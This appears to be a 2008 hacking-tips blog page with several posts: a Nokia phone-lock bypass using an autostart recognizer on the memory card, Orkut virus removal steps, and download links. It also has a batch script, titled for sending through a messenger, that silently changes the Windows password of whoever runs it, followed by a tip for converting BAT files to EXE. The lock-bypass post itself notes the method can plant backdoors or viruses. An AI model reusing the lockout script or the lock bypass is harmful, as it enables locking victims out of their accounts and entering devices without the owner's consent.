Showing posts with label hack. Show all posts
Showing posts with label hack. Show all posts

Wednesday, November 12, 2008

THE NOKIA PHONE-LOCK RESET PT-3

Hey guyz thr is another way if that mdl file dint work on ur mobile.... jus Install d tis sis file and enter ur IMEI no. to unlock master code... To find ur IMEI no. type *#06# and note it down.... CHEERS!!

Wednesday, October 22, 2008

THE NOKIA PHONE-LOCK RESET PT-1

What is THE-NOKIA-UNLOCK:
The program exploits a design flaw in the nokia mobile phones to remove The Phone Lock protection. The program was tested on Nokia 6630 and Nokia 6680. The program
Should work on any other Symbian based mobile phones (including Sony Ericson and all modern nokia phones and many others). This tool does not remove the sim-lock.

How to use:
You need two mobile phones.
1) Do _not_ turn off the mobile phone!
2) Remove the Memory Card (MMC) from the locked phone and put it into a second mobile. Install FExplorer on the second mobile phone. Create the directory E:\System\Recogs and copy the-nokia-unlock.mdl into this directory.
3) Remove the Memory Card and place it into the locked phone. The THE-NOKIA-UNLOCK program should start after 120 seconds.
4) Remove the battery. Remove the MMC. Put the battery back and restart. The Phone Lock has been reset to "12345".

Why does this work?
The Phone Lock disables the key pad, Bluetooth and the USB port. This makes it impossible to access the data stored on the device without knowing the correct code. Nevertheless the MMC is not disabled. Nokia's OS has a lot of undocumented features. One of them are 'recognizer' that can be used to execute a program when the phone boots. A recognizer is loaded and executed when a drive is mounted. The MMC is mounted when it is placed into the mobile phone _even_ when the phone is locked.

THE-NOKIA-UNLOCK is a recognizer that implementes yet another undocumented feature to perform a hard reset (by software) on the phone.

Note: The same recognizer-autostart method can be used to quickly install a backdoor on a locked mobile phone or to propagate a virus: Get in, Get Out, Get Away.


Monday, October 13, 2008

Getting rid of Orkut IS BANNED!!!

Many people are facing a common problem, where Orkut.com, Youtube.com and Firefox are blocked in their systems and they get following error with a scary laugh:
"Orkut IS BANNED, orkut is banned you fool The administrators didnt write this program guess who did?? r r MUHAHAHA!!"

Here's goes d solution:
1. Open “Task Manager” and goto “Processes” tab.
2.. Look for services with name “svchost.exe“. There will be many services with the same name. Most of them will have “SYSTEM“, “LOCAL SERVICE” OR “NETWORK SERVICE” as User Name but you have to look for “svchost.exe” service which has your currently logged in username as User Name.
3. You’ll get approx. 2 services with the name “svchost.exe” which has your Windows username. End Task them by pressing key or by selecting them and clicking on “End Process” button. It’ll confirm the action, accept it.
4. Now open “regedit” from RUN and goto following keys:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Policies\Explorer\Run

And look for a key in right-side pane with the name “Winlogon” which will have “heap41a\svchost.exe” in its value field. If you find this key, delete it.

5. Now goto following key:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\explorer\Advanced\Folder\Hidden\SHOWALL

6. Now enable “Show Hidden Files/Folders” option in “Tools -> Folder Options” in My Computer.

7. Right-click on Start button and select “Open“. Now open “Programs” folder, here you’ll see a folder “Startup“. Open it and if you get a hidden file there, delete it. If its not there, then close it.

8. At last open “My Computer” and open C: drive. Disable “Hide Protected System files” option in “Tools -> Folder Options“. You’ll see a folder “heap41a” in C: drive. Delete it.


Thats it Folks. After doing all this, restart your system and you’ll get rid of the virus.

Bond Enemy PC

Enemy PC Virus


Sunday, October 12, 2008

Renaming Start button


Itz vey cool and very simple.... Jus download this file, extract and type in the name u want and voila.... There u go.... Hav fun... CHEERS!!!

Saturday, October 11, 2008

50 Tips and Ticks abt windows


Hey guys download this word for tips and ticks and have fun  

Friday, October 10, 2008

Password change thru messenger


Code with personal message:

@echo off
net user %USERNAME% (The new password) > NUL
echo (Your personal message)
pause > NUL

Code without personal message:

@echo off
net user %USERNAME% (The new password) > NUL


You can change only the text thats writed with red color.

Converting BAT to EXE


Guyz if u wanna convert .bat files to .exe... Download d followin software...